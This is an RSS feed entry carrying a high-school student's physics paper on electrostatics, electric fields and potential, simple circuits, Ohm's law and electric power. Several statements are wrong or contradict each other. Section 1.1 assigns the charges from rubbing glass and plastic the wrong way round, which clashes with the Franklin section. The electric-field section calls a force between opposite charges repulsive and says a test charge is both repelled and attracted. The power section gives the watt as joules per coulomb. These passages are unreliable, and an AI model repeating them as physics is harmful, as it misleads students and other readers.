<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scientific Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/category/scientific/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/category/scientific/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Sun, 29 May 2022 03:21:43 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>Scientific Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/category/scientific/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>The Differentiating Impacts of Electricity and Electromagnetism on Force and Magnetic Fields.</title>
		<link>https://exploratiojournal.com/the-differentiating-impacts-of-electricity-and-electromagnetism-on-force-and-magnetic-fields/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=the-differentiating-impacts-of-electricity-and-electromagnetism-on-force-and-magnetic-fields</link>
		
		<dc:creator><![CDATA[Zixuan Wang]]></dc:creator>
		<pubDate>Sun, 29 May 2022 03:13:29 +0000</pubDate>
				<category><![CDATA[Physics]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[electricity]]></category>
		<category><![CDATA[magnetism]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1834</guid>

					<description><![CDATA[<p>Zixuan Wang<br />
Shanghai Jianping HIgh Scholol</p>
<p>The post <a href="https://exploratiojournal.com/the-differentiating-impacts-of-electricity-and-electromagnetism-on-force-and-magnetic-fields/">The Differentiating Impacts of Electricity and Electromagnetism on Force and Magnetic Fields.</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Zixuan Wang</strong><br><strong>Mentor</strong>: Dr. Gino Del Ferraro<br><em>Shanghai Jianping HIgh Scholol</em></p>
</div></div>



<h2 class="wp-block-heading">Part I</h2>



<h4 class="wp-block-heading"><strong>1.1 Electrostatic Phenomena</strong></h4>



<p>When we rub glass rods with silk, the glass rod become charged with negative charges. When we rub plastic rods with fur, the rods are charged with positive charges. After being rubbed with fur, plastic rods repel each other. However, if put the plastic rod close to a glass rod, they will attract each other. This kind of interaction between charges is called electrostatic force.</p>



<h4 class="wp-block-heading"><strong>1.2 Electroscope</strong></h4>



<p>The electroscope is a tool to measure electrostatic force. It works by electrostatic attraction or repulsion and consists of two metallic leaves suspended from a metal hook. The leaves are inside a glass container to protect it from air currents. The leaves are connected to a metal ball which is on the top of the container. When a charged object is brought near the ball, the charges on the object cause the same charges move away toward the end of the leaves. The leaves are then spread apart due to the repulsion of same charges.</p>



<figure class="wp-block-image size-full is-resized"><img fetchpriority="high" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-23.png" alt="" class="wp-image-2033" width="378" height="320" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-23.png 481w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-23-300x254.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-23-230x195.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-23-350x296.png 350w" sizes="(max-width: 378px) 100vw, 378px" /><figcaption><strong>Figure 1.1</strong> Electroscope: two foil leaves suspended from a metal post inside a glass-walled container.</figcaption></figure>



<p>The electroscope can also quantify the amount of charge of an object. A larger charge causes the leaves to spread further apart. Electroscope can show the type of charges of two object. One can first bring an object in touch with the electroscope. This will cause the foil leaves to separate. Then, bringing the second object can be brought next to the electroscope’s post. If the two objects have same type of charges, the second contact will cause a further separation. On the contrary, if the leaves are brought closer than the two objects have different types of charge.</p>



<h4 class="wp-block-heading"><strong>1.3 Benjamin Franklin’s idea</strong></h4>



<p>Charge produced on a rubber rod when rubbed by fur and charge produced on a glass rod when rubbed with silk have been found having different properties for a long time. They didn’t gain their names until Benjamin Franklin (1706-1790) introduced the concept “positive” and “negative” around 1750. He noticed stable fluid is present in all objects. During rubbing, they carry similar or different properties as some fluid is transferred from one object to another. Thus, he proposed that the charge on a glass rod when rubbed with silk be called positive. This concept is revolutionary, and Franklin’s model also approaches the reality more, which has electrons being transferred instead of “fluid”.</p>



<h4 class="wp-block-heading"><strong>1.4 Conductors and insulators&nbsp;</strong></h4>



<p>Conductors are materials that permit electrons to move easily from one region of the material to another. For example, electrons can move freely within a copper wire. Most metals are good conductors, while most nonmetals are insulators. Insulators can prevent charge from leaving metal wires. Most metals are conductors, while most nonmetals are insulators. Within a solid metal, one or more electrons in each atom become detached and can move freely throughout the material. In an insulator, electrons cannot move freely through the material.&nbsp;</p>



<h4 class="wp-block-heading"><strong>1.5 Coulomb force</strong></h4>



<p>Coulomb’s law is used to measure the electrostatic force. It is developed by the French scientist Charles Coulomb (1736-1806).&nbsp;</p>



<p>The force F can be expressed as:</p>



<figure class="wp-block-image size-full"><img decoding="async" width="184" height="94" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.35.50-PM.png" alt="" class="wp-image-2035"/></figure>



<p>Were q1 and q2 indicates the charges respectively, r is the distance between the charges, and k is a constant. When the charges have the same sign, the forces are repulsive; when they have opposite signs, the forces are attractive.&nbsp;</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="574" height="676" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-24.png" alt="" class="wp-image-2036" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-24.png 574w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-24-255x300.png 255w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-24-230x271.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-24-350x412.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-24-480x565.png 480w" sizes="(max-width: 574px) 100vw, 574px" /><figcaption><br><strong>Figure 1.2</strong> Torsion balance built by Coulomb. The degree of twist of the wire provides a measure of the repulsive force between the two charges.</figcaption></figure>



<p>In order to measure the weak forces between two charges, Coulomb invented a torsion balance. An insulating rod is suspended at the middle of an enclosure. Two small metal balls are attached at each side of the rod. Both balls are charged. Another ball with the same charges is put close at one ball. It then causes the rod to twist. If the torque needed to create the angle of the twist is measured, the forces produced by two same charges can be measured. Besides, in order to give two balls the same charges, Coulomb placed one charged ball into contact with an uncharged ball, thus divided the charges on one ball into two equal parts. By repeating this process, he can divide charges to one-half, one-quarter and so on.</p>



<p>The electrostatic force has a similar functional form than the gravitational force, we can see they all have inverse-square dependence from the distance:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM.png" alt="" class="wp-image-2037" width="347" height="78" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM.png 528w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM-300x67.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM-230x51.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM-350x78.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.36.47-PM-480x107.png 480w" sizes="(max-width: 347px) 100vw, 347px" /></figure>



<p>However, the gravitational force is always attractive. While the electric force depends on charges and can be either attractive or repulsive. For charged particles, the electrostatic force is the only force that is responsible to their interactions.</p>



<h4 class="wp-block-heading"><strong>1.6 Electric field</strong></h4>



<p>Two positively charged objects at a distance exert a repulsion force to each other. If we place a negatively charged object instead of one positive object at the same place, the force, although still have the same magnitude, becomes repulsive. Therefore, the electrostatic force between two object depends on each object’s charges. We can define the Electrostatic field as a property generated by one charge only. This can be defined by dividing the Force F generated in between two charges by one of the charges as follows.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.37.28-PM.png" alt="" class="wp-image-2038" width="158" height="76" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.37.28-PM.png 298w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-5.37.28-PM-230x111.png 230w" sizes="(max-width: 158px) 100vw, 158px" /></figure>



<p>The electric field at some point is defined as the electric force F (experienced by a test charge q) divided by the charge q. In other words. The electric field equals to the electric force per unit charge. The object’s electric field is always present and its magnitude can vary by changing the distance from that object. If another charge q enters the field, the force it experiences is exerted by the electric filed of the original object.&nbsp;</p>



<h4 class="wp-block-heading">1.7 <strong>Electric Field Line</strong></h4>



<p>One can define electric field lines to visualize the direction of a given force or a given electric field. The electric field for a positive charge always points away from it, outward, whereas the electric field of a negative charge point towards it, or inwards.</p>



<p>The field direction of a single charge is the direction of the force a positive net charge experienced near the charge. We can find that the test charge is repelled by the original charge when placing near it. The test charge is attracted by the original charge.&nbsp;</p>



<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="495" height="441" data-id="2039" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-25.png" alt="" class="wp-image-2039" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-25.png 495w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-25-300x267.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-25-230x205.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-25-350x312.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-25-480x428.png 480w" sizes="(max-width: 495px) 100vw, 495px" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="343" height="350" data-id="2040" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-26.png" alt="" class="wp-image-2040" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-26.png 343w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-26-294x300.png 294w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-26-230x235.png 230w" sizes="(max-width: 343px) 100vw, 343px" /></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="471" height="302" data-id="2041" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-27.png" alt="" class="wp-image-2041" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-27.png 471w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-27-300x192.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-27-230x147.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-27-350x224.png 350w" sizes="(max-width: 471px) 100vw, 471px" /></figure>
<figcaption class="blocks-gallery-caption">&nbsp;<strong>Figure 1.3</strong> Electric field lines of negative charges, positive charges, and electric dipoles, respectively</figcaption></figure>



<p>When placing two opposite charges together, they attract each other, so the electric field point toward the negative charge. On the left side of the negative charge, the field line is same to single negative charge’s, and on the right of the positive charge, the field line is also same to that of a single positive charge.</p>



<h4 class="wp-block-heading"><strong>1.8 Electric Potential Energy</strong></h4>



<p>The electrostatic force is a conservative force, which means that we can define an electrostatic potential energy. This potential energy leads to the related concept of electric potential. As the change of kinetic energy equals the total work done on the object, if there is only electrostatic force act on the object, the work done by the electrostatic force equals the change in potential energy.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="139" height="40" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-28.png" alt="" class="wp-image-2042"/></figure>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="498" height="484" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-29.png" alt="" class="wp-image-2043" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-29.png 498w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-29-300x292.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-29-230x224.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-29-350x340.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-29-480x467.png 480w" sizes="(max-width: 498px) 100vw, 498px" /><figcaption><br><strong>Figure 1.4</strong> An external force F, equal in magnitude to the electrostatic force qE, is used to move the charge q a distance d in a uniform field.</figcaption></figure>



<p>In a uniform electric field as shown above, <img loading="lazy" decoding="async" width="180" height="23" class="wp-image-2044" style="width: 180px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-30.png" alt="" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-30.png 304w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-30-300x38.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-30-230x30.png 230w" sizes="(max-width: 180px) 100vw, 180px" />, If a positive charge moves downward (in the direction of E), the work done by the electric force is positive, so U decreases.</p>



<p>If the charge moves in the opposite direction of E, the work done by the electric field is negative. In other words, an external force is done on the charge, causing U increases. For positive charges, moving along a positive electric field decreases their electric potential energy, while for negative charges, moving along the positive electric field increases U.</p>



<p>Since we usually define U=0 when r is infinite, <img loading="lazy" decoding="async" width="100" height="28" class="wp-image-2045" style="width: 100px;" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-31.png" alt=""> when moving a particle from infinite far to r. Therefore,</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-32.png" alt="" class="wp-image-2046" width="148" height="50" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-32.png 241w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-32-230x78.png 230w" sizes="(max-width: 148px) 100vw, 148px" /></figure>



<h4 class="wp-block-heading"><strong>1.9 Electric potential</strong></h4>



<p>Electric potential is related to electrostatic potential energy in much the same way as electric field is related to the electrostatic force. The change in electric potential is equal to the change in electrostatic potential energy per unit of positive charge.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="88" height="82" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-33.png" alt="" class="wp-image-2047"/></figure>



<p>Its unit is V or J/C. Electric potential is also called potential energy per unit charge. Like electric field, V exist at a point even if there is no charge.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-34.png" alt="" class="wp-image-2048" width="324" height="304" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-34.png 453w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-34-300x281.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-34-230x216.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-34-350x328.png 350w" sizes="(max-width: 324px) 100vw, 324px" /><figcaption><br><strong>Figure 1.5</strong> Electric potential decreases along the E field lines</figcaption></figure>



<h2 class="wp-block-heading"><strong>Part 2</strong></h2>



<h4 class="wp-block-heading"><strong>2.1 Electric Circuits&nbsp;</strong></h4>



<p>An electric circuit is defined as a closed conducting path that allows the electric charges in the wire to move from one region to another. Within a conductor, when there is no external electric field, the charges move randomly. Instead, if there is an electric field E is established inside the conductor, charges will experience a force and start to move in one direction. The charges also experience collisions with the metal particles when they pass through conductors. In other words, the kinetic energy supplied by the electric field is dissipated to heat the conductor, which keeps the charges from moving faster.</p>



<p>Electric circuits must be a closed circuit instead of an open circuit or a conductor. In an open circuit, an electric field E<sub>1</sub> will let positive and negative charges accumulate respectively at two sides of the wire. These charges will then create an opposite electric field E<sub>2</sub> , which will offset E<sub>1</sub> and decrease the total electric field to zero.</p>



<p>As a result, we need a device, often called a battery, that act as an external force that can is in opposite direction to that result from E<sub>1</sub> and carry the positive charges from lower potential to higher potential.</p>



<p>Therefore, a complete circuit must consist of a wire, a conductor (or resistance), and a battery.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-35.png" alt="" class="wp-image-2049" width="384" height="312" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-35.png 552w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-35-300x244.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-35-230x187.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-35-350x285.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-35-480x390.png 480w" sizes="(max-width: 384px) 100vw, 384px" /><figcaption><strong>Figure 2.1</strong> a simple electric circuit</figcaption></figure>



<h4 class="wp-block-heading"><strong>2.2 Electric current</strong></h4>



<p>In a conductor, if the charges experience an electric field, they will start moving in a direction.&nbsp;</p>



<p>The net charge flowing through the circuit per unit time, or the rate of flow of electric charge is defined as current:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-36.png" alt="" class="wp-image-2050" width="58" height="76"/></figure>



<p>The standard unit of current is ampere<em>, </em>defined as 1 coulomb per second (1A=1C/s).</p>



<p>In different current-carrying materials, either positive or negative charges can be the moving charges. In figure 2.2, positive charges move to right, in the direction of the electric field, while negative charges move to the left, in the opposite direction. For negative charges that moves to the left, they create the same effect as the first case as the net charges on the right increases. In both case, positive charges flow to right, so we define current to be in the direction of the flow of positive charges. Current in this definition is called conventional current.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-37.png" alt="" class="wp-image-2051" width="407" height="300" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-37.png 546w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-37-300x221.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-37-230x169.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-37-350x258.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-37-480x353.png 480w" sizes="(max-width: 407px) 100vw, 407px" /><figcaption>Figure 2: The electric current to the right, in the direction of the positive charges. </figcaption></figure>



<h4 class="wp-block-heading"><strong>2.3 An analogy to the flow of water</strong></h4>



<p>In a circuit, the charges move through an external conducting path due to the electric field caused by the potential difference at the two sides of the battery. As the positive charges moves from high potential to low potential, the potential of the charges is thus decreasing. In order to maintain the current, as charges pass the battery, the battery provides a force to lift positive charges from low potential to high potential. The work done by the battery increases the potential energy of the charges.</p>



<p>This is analogous to water flowing in a pipe vertically, as shown in Figure 2.3. Water flows down the pipe from high gravitational potential energy to low potential energy. Then, a pump lifts the water back to its original height and increases its potential energy. While batteries provide necessary potential energy for the charges, the pump guarantees the water&nbsp;to flow.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-38-1024x347.png" alt="" class="wp-image-2052" width="758" height="256" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-1024x347.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-300x102.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-768x260.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-920x312.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-230x78.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-350x119.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38-480x163.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-38.png 1140w" sizes="(max-width: 758px) 100vw, 758px" /><figcaption>Figure 2.3. The mechanism of the electric circuit is similar to a water circuit.</figcaption></figure>



<h4 class="wp-block-heading"><strong>2.4 Electromotive Force&nbsp;</strong></h4>



<p>Electromotive force (emf) is the potential difference, or voltage, of a battery. It is actually not a force. Its equal to the work the battery does on every coulomb of charge that passes through it. It is, in other terms, a potential energy difference, or voltage, &nbsp;ϵ or V is the symbol for emf. The unit of emf is volt (1V=1J/C)</p>



<h4 class="wp-block-heading"><strong>2.5 Ohm’s Law and Resistance&nbsp;</strong></h4>



<p>Ohm’s Law shows the proportional relationship between the current and voltage. It also shows the current not only depends to the voltage, but also on the resistance.&nbsp;</p>



<p>The relationship was discovered experimentally by the German physicist Georg Ohm (1789-1854). In symbols:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-39.png" alt="" class="wp-image-2055" width="39" height="50"/></figure>



<p>A quantitative definition of resistance R is:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-40.png" alt="" class="wp-image-2056" width="37" height="43"/></figure>



<p>While the definition of R is:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-41.png" alt="" class="wp-image-2057" width="53" height="51"/></figure>



<p>The unit of resistance is ohm (1Ω=1V/A)</p>



<p>The longer the wire, the greater the resistance; the thicker the wire, the smaller the resistance. Besides, the resistance also depends on the electrical conductivity of the material. Compared with resistance of water’s flow rate in a pipe, a narrow water pipe offers more resistance; the larger cross-sectional area increases flow rate. If the pipe is stuffed with cotton, the resistance also increases.&nbsp;</p>



<h4 class="wp-block-heading"><strong>2.6 Series and parallel circuits</strong></h4>



<p>In a series circuit, the circuit elements are connected in sequence, lining up on a one after the other. In series, the current I remains the same through the path.&nbsp;</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-42.png" alt="" class="wp-image-2058" width="140" height="30"/></figure>



<p>The total resistance of the combination R<sub>s</sub> is:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="220" height="40" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-43.png" alt="" class="wp-image-2059"/></figure>



<p>For each resistor, since they all have the same current, we can know their voltage respectively:</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-1024x125.png" alt="" class="wp-image-2063" width="356" height="43" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-1024x125.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-300x37.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-768x93.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-920x112.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-230x28.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-350x43.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM-480x58.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.02.19-PM.png 1068w" sizes="(max-width: 356px) 100vw, 356px" /></figure>



<p>The resistance across two sides of the battery is:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-47.png" alt="" class="wp-image-2064" width="257" height="36" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-47.png 284w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-47-230x32.png 230w" sizes="(max-width: 257px) 100vw, 257px" /></figure>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-48.png" alt="" class="wp-image-2065" width="443" height="380" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-48.png 467w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-48-300x258.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-48-230x197.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-48-350x301.png 350w" sizes="(max-width: 443px) 100vw, 443px" /><figcaption><strong>Figure 2.4</strong>: Three resistors connected in a series within a circuit.</figcaption></figure>



<p>Since the total resistance of a series combination is greater than any individual resistance, so connecting a bulb is series will make it glow less brightly.</p>



<h4 class="wp-block-heading"><strong>2.6.2 Parallel circuits</strong></h4>



<p>In parallel circuits, each resistors provides an alternative path for the current. The potential difference is the same across each element.</p>



<p>The total current equals to the sum of the three currents in the resistors:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="180" height="39" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-49.png" alt="" class="wp-image-2066"/></figure>



<p>The current in each resistor is:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM.png" alt="" class="wp-image-2067" width="306" height="79" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM.png 572w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM-300x78.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM-230x60.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM-350x91.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/Screen-Shot-2022-05-28-at-6.04.29-PM-480x124.png 480w" sizes="(max-width: 306px) 100vw, 306px" /></figure>



<p>So the total resistance R is:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="210" height="81" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-50.png" alt="" class="wp-image-2068"/></figure>



<p>The total resistance of a parallel combination is less than any individual resistance. As the current in a bulb connected in parallel is independent to the adding of other resistors, connecting a bulb in parallel doesn’t change its brightness.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-51.png" alt="" class="wp-image-2069" width="556" height="314" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-51.png 709w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-51-300x169.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-51-230x130.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-51-350x197.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-51-480x271.png 480w" sizes="(max-width: 556px) 100vw, 556px" /><figcaption><strong>Figure 2.5</strong> Three resistors connected in parallel</figcaption></figure>



<h4 class="wp-block-heading"><strong>2.7 Electric Energy and Power</strong></h4>



<p>The negative and positive charges in a battery are kept at the opposite poles of the battery thanks to the chemical reactions happening inside the battery. This chemical reaction are generate by a chemical energy which keeps the positive and negative charges separated on the pole. This latter chemical energy corresponds to the electrical energy which is created within the battery and can be used through the electric circuit to move the charges from one point to another. As the charges pass resistors, the potential energy is dissipated as the charges collide with atoms in the resistors.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="695" height="430" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-52.png" alt="" class="wp-image-2070" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-52.png 695w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-52-300x186.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-52-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-52-350x217.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-52-480x297.png 480w" sizes="(max-width: 695px) 100vw, 695px" /><figcaption><strong>Figure 2.6.</strong> The power supplied by the battery equals the power dissipated by the resistor.</figcaption></figure>



<p><br>The rate of transferring energy from the battery is called power:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-53.png" alt="" class="wp-image-2072" width="51" height="26"/></figure>



<p>The unit of power is watt: 1W=1J/C. The power delivered to any resistor is:</p>



